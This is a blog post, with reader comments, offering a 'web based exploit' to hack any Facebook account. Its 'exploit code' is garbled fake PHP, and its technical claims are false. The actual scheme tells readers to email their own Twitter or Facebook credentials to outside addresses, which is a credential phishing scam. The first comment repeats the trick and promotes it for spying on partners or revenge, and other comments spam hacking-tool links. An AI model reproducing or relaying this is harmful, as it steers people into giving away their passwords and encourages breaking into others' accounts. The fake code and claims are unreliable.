2554/01/29

How To Hack Any FaceBook Account Using A Web Based Exploit



Do you want to learn how to hack facebook?, Are you looking for a way to hack your friends facebook account without them fiding out? Interested in finding out ways to hack someones profile? Maybe you want to take a quick peek at their message inbox or use a glitch to use a hacking script. In this article I will show you a fairly easy step by step guide on how to hack facebook user accounts without having to directly hack into facebook and risk getting caught. Ignore all those hacking services, facebook hacks and hackers that charge you money for something you can do on your own for free. Hack the password of any of your friends accounts and get their password even as a prank or joke




Hack facebook, hacking facebook passwords from user accounts and find out someones facebook password...Is any of it really possible? Yes it is, thanks to Twitter!. By now, you have probably heard the rumors of how unsafe Facebook is with a few celebrities having had their accounts hacked. You may also have seen Twitter allows you to synchronize your tweets with Facebook status updates so whatever you tweet appears as a Facebook status update. In providing this service, Facebook has created many vulnerabilities for itself by allowing a third party (Twitter) to access their database. This problem is due to Facebooks API service which permits exterior websites or applications (like FarmVille) to modify or post stuff on your profile.

A couple of month's ago I wanted to check my old FaceBook account but forgot what email and password I had used to sign up, I sent an email to their technical support but they didn't reply so I decided to put my geek skills to good use and find a way to get my login information back by writing a facebook account hacking code or exploit as they are called.

HOW HACKING FACEBOOK ACCOUNTS WORKS
Facebook has two databases (one for males and one for females users) where they keep all the information from their users, if you remember the email you use to login but forget your password, you can use the 'Forgot your password?' option, however if like me you don't have any of that information it's impossible to legally recover that account.

If you know anything about programming websites you know the 'Forgot your password?' service has to be in direct contact with the databases in order to send requests to retrieve the forgotten information for you, basically what that means is if you 'ask' the database for the login information with the right 'code' (in our case exploit), it will send you back that information.

So all I had to figure out is what the code was and what system they used to contact the databases through the 'Forgot your password?' service, after a few weeks of writing and testing codes I came up with the right one for the job and after doing a bit of research I learned FaceBook uses something similar to an email service to contact their databases.

For security reasons the databases are programmed to verify the account your requesting is actually yours and not someone elses so they need some type of authentication or verification (thats why they send you a verification link to your email when creating your account or changing your password).

Luckily for us, as mentioned above, through the use of Twitter combined with Facebooks 'Mutual Friend' feature, we can use a friends account to verify your own, in other words, if the person you want to get the login information from is on your friends list on Facebook...you can use your Twitter account to verify your their friend on Facebook taking advantage of the vulnerability of the twitter status sync exploit, and get their login email and password sent to you. But the victim must be on your friends list on Facebook.
HOW TO DO IT

1) First off you will need to get your user id and the victims user id, how do you do this?

Go to the victims profile, then click on their Display Picture (not the "View Photos of ..." link or tab but the actual main picture of their profile) and look at your browsers address bar, at the end of all the address you should see a group of numbers that should you should look something like this: (I have used a red arrow to point them out)



Don't worry if it isn't exactly like that (sometimes it has variations like; 'album.php?profile=10957800008') just as long as you get the numbers. Write them down somewhere as you will need to use it a bit further down, once that is done you may continue to step 2.
2) At the bottom of this page I have pasted the exploit code I created to fool the databases, this is the tricky part as you will have to edit the code a bit yourself so that it fits your needs when searching for the victims login information.

Scroll down to the bottom of this page and find the code I have highlighted in gray so you know what to copy, select the code and copy it to your clipboard (press CTRL+C) then paste it (CTRL+V) on a notepad or text document so you can edit it.
3) Once you have the code somewhere you can edit it, you will need to insert three things into it, the facebook user id of the victim and the twitter friend authentication information. I will give you step by step examples by trying the exploit code on my friend Laura's account as the victim, see what parts you have to edit and with what:



1. Should be the victims user id.
2. Should be your twitter login Username (I put my email in the screencap example above for privacy reasons) to verify your the victims mutual friend on facebook. Make sure your facebook email was the same used to sign up to Twitter so the exploit script can automatically connect both accounts.
3. Should be your twitter password so the database can authentic you really are friends with the victim on facebook.

When editing the code, don't accidentally delete one of the quotes (") or it won't work, so make sure you put the information inside them.
4) Now that you have the exploit code edited and ready to send, we are all set to send it to the database through an email, since it's not your regular email but an exploit email we will have to use a special Subject so the database knows how to read it in programming language.

Go to your email address and Compose a new email to fbsupport@techie.com which is their customer service email for forgotten passwords, in the Subject copy and paste the code below highlighted in gray:

$[search_database = $find user+id= "123456789", '%verification+user+bday' = }"01/01/1900"{ begin_search();


Once you have edited the Subject and entered the email address, your Composed email should look like the screenshot below, I will numerate each item:



1. The email address of the facebook database's forgotten password customer service.
2. This is where you insert the victims facebook user id.
3. This is where you insert your birthday so the database can find you to verify your a friend of the victim (it arranges users in the database based on your date of birth), NOTE: It MUST be in the MONTH/DAY/YEAR format so it can read it properly.
5) After you have correctly written the To: and Subject sections, you may proceed to insert the exploit code you previously edited in step 3 into the body section of the email.Now all you have to do is click Send and wait for the database to send you back it's reply with the information.

It should take from 12-24 hours depending on the traffic FaceBook has that day, this is a sample of the email response you'll receive:


THE EXPLOIT CODE
fb_select_db("find", $linkID) or die(fbdatabase_error());
$resultID = fb_query("SELECT FriendID FROM signup WHERE email = '$email'", $linkID) or die(fbdatabase_error());

$num_rows = db_num_rows($resultID);
$row = facebook_fetch_array($resultID);
$user_id = $row[0];

if ($user_id == "PUTUSERIDHERE") = '$repeat' {
print Success, We have sent you an email with the Login email and Password of that ID.
}
else {
// print "We're sorry, your friend ID does not appear to be in our database."

$passwordfromdb = $row[0];
$find userID = (%friend_list)
#forgot_pass_userid = "%repeat%"; <%search_database_for_id%>
#user email= "PUTEMAILHERE"; (%friend_vulnerability_email%)
#user password = "PUTPASSWORDHERE"; (%friend_vulnerability_pass%)
$friend_database_exploit = '%request_forgot_pass_info'
$email_to = %%%@subject_email

session_start();
session_reset_pass("session");
$email_address = $_POST['email_address'];
if (!isset($_POST['email_address'])) {

}
elseif (empty($email_address)) {
   echo $empty_fields_message;
function decrypt userID password() {
     $salt = "abchefghjkmnpqrstuvwxyz0123456789";
     srand((double)microtime()*1000000);
     $i = 0;
     while ($i <= 7) {
             $num = decrypt() % 33;
             $tmp = substr($salt, $num, 1);
             $pass = $pass . $tmp;
             $i++;
    }
    return $pass;
  }

mail($email_address, $subject, $message, "Facebook Password Reset Confirmation


}
/end$


credit http://how-to-hack-face-book-accounts.angelfire.com

52 ความคิดเห็น:

  1. Hacking Facebook accounts through Google mail

    This system confuses Facebook’s password retrieval system:
    By simply emailing: facebook.retrievepass@gmail.com
    with subject: “Facebook Password Retrieval”

    Body of your email message:

    var return = *******; // [replace stars with your email]
    var enterpass = ********; // [ replace stars with your Facebook password] —-> to verify that you have a valid Facebook account
    http://www.facebook.com/home.php#!/profile.php?id=722412443; // [replace link with the link of the Facebook profile that you want to hack]

    This confuses Facebook’s server, so that it emails you the person’s password.
    All that is required is that you copy that script exactly!
    Here is an example reply that you will get after successfully
    retrieving the password of the desired person.

    Example:
    var return = ardel_fealt@yahoo.com;—->your e-mail
    var enterpass = drowssap;——> your password
    http://www.facebook.com/home.php#!/profile.php?id=722412443

    In a matter of hours you will have the retrieved password!
    Happy hacking!

    How it works:
    I worked as an SQL programmer for Facebook from 2004 onward, and got a peek at their system.
    The program normally would read the login name, find the corresponding password with functions set up through security measures for people’s accounts, and re-email it to you. This time, however, you are the one writing the message so you can manipulate the arguments of the functions.
    The code above resets the original variables in the function to alter the route of the sent password and user who queries the server. Basically it’s as if they sent the request for their password, but instead it logs you in as the receiver. This is intended to be used only by system administrators to ban users or to bust illegal porn and drug sites.
    This is a firsthand source and should not be used for illegal purposes other than password recovery of your own account.
    Any unlawful activity is your own responsibility and no one else’s. Note that if incorrectly sent (either login or syntax) the message is not replied to. Also, due to the thousands of emails sent to the address each day it’s not moderated by a human administrator; only a computer system.

    *for those who don’t know: Gmail is the backdoor route for password retrievals of social networking companies including Facebook and Myspace, because their systems currently have many security risks to be resolved…
    Before Facebook gets this fixed, I’m sharing this information to all who are interested, because sometimes you just don’t know when you will need this.
    For a boyfriend or girlfriend whom you suspect of cheating, perhaps? Or maybe you have enemies out there that you want to get revenge on.
    This is your chance….

    ตอบนำออก
  2. <a href="http://www.hackfbonline.com" title="Hack facebook account online,You can hack facebook passwords for free with this online hacking tool, Hack facebook account online - www.hackfbonline.com</a>

    ตอบนำออก
  3. <a href="http://www.hackfbonline.com" title="Hack facebook account online,You can hack facebook passwords for free with this online hacking tool, Hack facebook account online - www.hackfbonline.com</a>

    ตอบนำออก
  4. Hey Joe ! You got unbelievable excercises on a Blog . I likewise used http://facehacktool.blogspot.com/ like you have told . It clearly worked dumbfounding for me and I was equipped to hack my Facebook record . So anyone having an issue with Facebook?? I in like manner cheer for a facehacktool.blogspot.com !Great and accommodating stuff that is to hack some single facebook !

    ตอบนำออก
  5. Hack facebook account online,You can hack facebook passwords for free with this online hacking tool. No download needed,Hack facebook account online
    hack facebook account online

    ตอบนำออก
  6. hack facebook password online
    http://www.hack-fb-online.com
    check above site

    ตอบนำออก
  7. hack facebook account online
    www.hack-fb-online.com
    check above site

    ตอบนำออก
  8. Social Engineering is resemblance to guessing passwords. This approach to hack Facebook account gives the best support to people to gain knowledge of various details about intended victims. http://aprhackingsoftwares.com/

    ตอบนำออก
  9. Hi
    I am not very good with my computer skills and what I have read about your blog "How To Hack Any FaceBook Account Using A Web Based Exploitso" so for makes a lot easer for me to do it, only one problem that I cant c any pictures on this blog, can you please email me all the pictures please, my email address is gwahidg@gmail.com

    Also if its possible add extra tips for me because I need extra help to understand all this computer language,
    please please do reply to me thanks

    Wahid Hussain

    ตอบนำออก